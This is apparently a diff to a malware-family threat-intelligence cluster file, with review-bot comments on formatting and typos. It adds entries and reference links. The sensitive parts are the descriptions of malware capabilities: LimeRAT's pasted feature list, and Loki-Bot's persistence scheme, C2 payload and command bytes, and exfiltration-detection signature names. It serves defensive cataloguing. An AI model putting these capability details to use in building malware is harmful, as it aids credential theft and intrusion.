@@ -8923,6 +10433,22 @@ "uuid": "f7674d06-450a-4150-9180-afef94cce53c", "value": "KokoKrypt" }, + { + "description": "KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", + "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99", + "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx" + ], + "synonyms": [], + "type": [] + }, + "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06", + "value": "KOMPROGO" + }, { "description": "", "meta": { @@ -9019,10 +10545,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", + "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/", "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf" + "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/" ], "synonyms": [ "BlackMoon" 
@@ -9050,13 +10577,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
+ "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
 "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
 "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
 "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
 "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
- "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
 "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
 "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
@@ -9124,12 +10652,26 @@
 "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
 "value": "Kurton"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki",
+ "https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff40299b-dc45-4a1c-bfe2-3864682b8fea",
+ "value": "Kutaki"
+ },
 {
 "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
- "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
+ "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
+ "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/"
 ],
 "synonyms": [],
 "type": []
@@ -9213,6 +10755,19 @@
 "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72",
 "value": "Laziok"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat",
+ "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "454db469-724a-4084-873c-906abf91d0d5",
+ "value": "LazyCat"
+ },
 {
 "description": "",
 "meta": {
@@ -9259,6 +10814,21 @@ "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, + { + "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", + "https://www.youtube.com/watch?v=x-g-ZLeX8GM", + "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", + "https://github.com/NYAN-x-CAT/Lime-RAT/" + ], + "synonyms": [], + "type": [] + }, + 
"uuid": "771dbe6a-3f01-4bd4-8edd-070b2eb9df66", + "value": "LimeRAT" + }, { "description": "", "meta": { @@ -9298,6 +10868,25 @@ "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", "value": "LiteHTTP" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga", + "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.abuse.io/lockergoga.txt", + "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880", + "https://www.youtube.com/watch?v=o6eEN0mUakM", + "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/", + "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4a6469d-6753-4195-9635-f11d458525f9", + "value": "LockerGoga" + }, { "description": "", "meta": { 
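Review bot: The LimeRAT description is the project's README pasted verbatim, markdown headings and feature bullets included, with a leading space before `## Description`. A threat-intelligence cluster entry should summarise the family in its own neutral words rather than reproduce the author's promotional feature list, and a markdown-heavy multi-line string renders poorly in consumers that display descriptions as plain text. Suggest a short factual summary along the lines of `"LimeRAT is an open-source .NET remote access trojan for Windows; reported capabilities include plugin-based modules, AES-encrypted C2, USB spreading, file encryption with a .Lime extension, a Monero miner, keylogging and credential theft."`, leaving the detailed feature list to the linked GitHub reference. The enclosing hunk starts on the previous line.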
@@ -9358,7 +10947,7 @@
 "value": "LockPOS"
 },
 {
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
+ "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
@@ -9400,22 +10989,36 @@ "value": "LogPOS" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. 
If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", + "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba", + "value": "LoJax" + }, + { + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. 
While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://isc.sans.edu/diary/24372", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + 
"https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" ], "synonyms": [ "Loki", 
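Review bot: The rewritten Loki-Bot description carries over the typo `This value value is typically \u201cckav.ru\u201d` from the old text, and the example mutex `\u201cB7E1C2CC98066B250DDB2123\u201c` closes with a left quote (`\u201c`) where the rest of the text closes with `\u201d`. Since this hunk already re-encodes every typographic quote as a `\u` escape, it is the natural place to fix both: `This value is typically \u201cckav.ru\u201d` and `\u201cB7E1C2CC98066B250DDB2123\u201d`. The hunk begins several lines earlier with the inserted LoJax entry.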
@@ -9440,17 +11043,31 @@
 "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2",
 "value": "Lordix"
 },
+ {
+ "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball",
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "484b9fd9-76c6-41af-a85b-189b0fc94909",
+ "value": "LOWBALL"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat",
- "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
+ "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
 "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
 "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
- "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
+ "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
 "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
- "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark"
+ "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
 ],
 "synonyms": [],
 "type": []
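Review bot: The new LOWBALL description has a stray comma after the subject and a hard line break (`\r\n`) in the middle of `cloud-storage\r\nservice`, which looks like a copy from a PDF column and renders as a broken sentence. Suggest `"LOWBALL uses the legitimate Dropbox cloud-storage service to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443."`.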
@@ -9458,6 +11075,20 @@
 "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a",
 "value": "Luminosity RAT"
 },
+ {
+ "description": " An uploader that can exfiltrate files to Dropbox.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney",
+ "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html",
+ "https://twitter.com/MrDanPerez/status/1097881406661902337"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b",
+ "value": "LunchMoney"
+ },
 {
 "description": "",
 "meta": {
@@ -9761,7 +11392,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat",
- "http://www.clearskysec.com/tulip/"
+ "http://www.clearskysec.com/tulip/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -9818,6 +11450,19 @@
 "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6",
 "value": "Mebromi"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical",
+ "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd055701-89ad-41be-b4d9-69460876fdee",
+ "value": "MECHANICAL"
+ },
 {
 "description": "",
 "meta": {
@@ -9847,6 +11492,21 @@
 "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06",
 "value": "Medusa"
 },
+ {
+ "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin",
+ "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html",
+ "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html",
+ "https://github.com/Ne0nd0g/merlin"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e",
+ "value": "Merlin"
+ },
 {
 "description": "",
 "meta": {
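Review bot: The LunchMoney description starts with a leading space (`" An uploader that can exfiltrate files to Dropbox."`), which a consumer that does not trim strings will display, and which makes the field compare unequal to its trimmed form in any dedup or diff step. The same leading space appears in the MurkyTop description on the next hunk line (there also opening in lowercase, `a command-line reconnaissance tool.`) and in the PHOREAL description further down; stripping whitespace in the generator would fix all three. In the Merlin entry on this line, `written in golang` would read better as `written in Go`.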
@@ -9963,6 +11623,7 @@
 "https://github.com/gentilkiwi/mimikatz",
 "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
 "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
 " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
 ],
 "synonyms": [],
@@ -10279,7 +11940,9 @@
 "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
 "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
 ],
- "synonyms": [],
+ "synonyms": [
+ "MPK"
+ ],
 "type": []
 },
 "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
@@ -10300,7 +11963,7 @@
 "value": "Multigrain POS"
 },
 {
- "description": "",
+ "description": " a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop",
@@ -10365,11 +12028,14 @@
 "value": "MyloBot"
 },
 {
- "description": "",
+ "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40",
- "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector"
+ "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware",
+ "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector",
+ "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html",
+ "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/"
 ],
 "synonyms": [],
 "type": []
@@ -10422,6 +12088,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
 "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/"
 ],
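Review bot: The N40 description embeds a dated claim, `As of March 2019, the malware is under active development with updated versions coming out on persistent basis`, which will silently go stale in a static cluster file and belongs in the dated references instead. The same string has a trailing space before a line break (`in attacks. \r\n`) and spells the vendor `VMWare`. Suggest ending the description after the third sentence, `...Uses legitimate VMware executable in attacks.`, and letting the refs carry the timeline.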
@@ -10598,11 +12265,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
 "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
- "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
+ "https://www.circl.lu/pub/tr-23/",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
 "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
- "https://www.circl.lu/pub/tr-23/"
+ "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
+ "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/"
 ],
 "synonyms": [
 "Recam"
@@ -10631,6 +12299,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino",
 "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
+ "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html",
 "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
 "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
 "http://securitykitten.github.io/an-evening-with-n3utrino/",
@@ -10795,8 +12464,9 @@
 "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
 "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services"
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html"
 ],
 "synonyms": [
 "Bladabindi"
@@ -10865,10 +12535,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
+ "https://www.cert.pl/en/news/single/nymaim-revisited/",
+ "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded",
+ "https://bitbucket.org/daniel_plohmann/idapatchwork",
 "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
 "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
- "https://www.cert.pl/en/news/single/nymaim-revisited/",
